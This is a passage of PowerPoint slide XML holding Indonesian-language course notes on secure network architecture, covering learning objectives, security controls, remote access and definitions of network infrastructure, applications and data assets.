              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip-prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunneling</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27550260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Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkontribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek-proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekomendasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Aset data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditransfer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diletakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di sana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
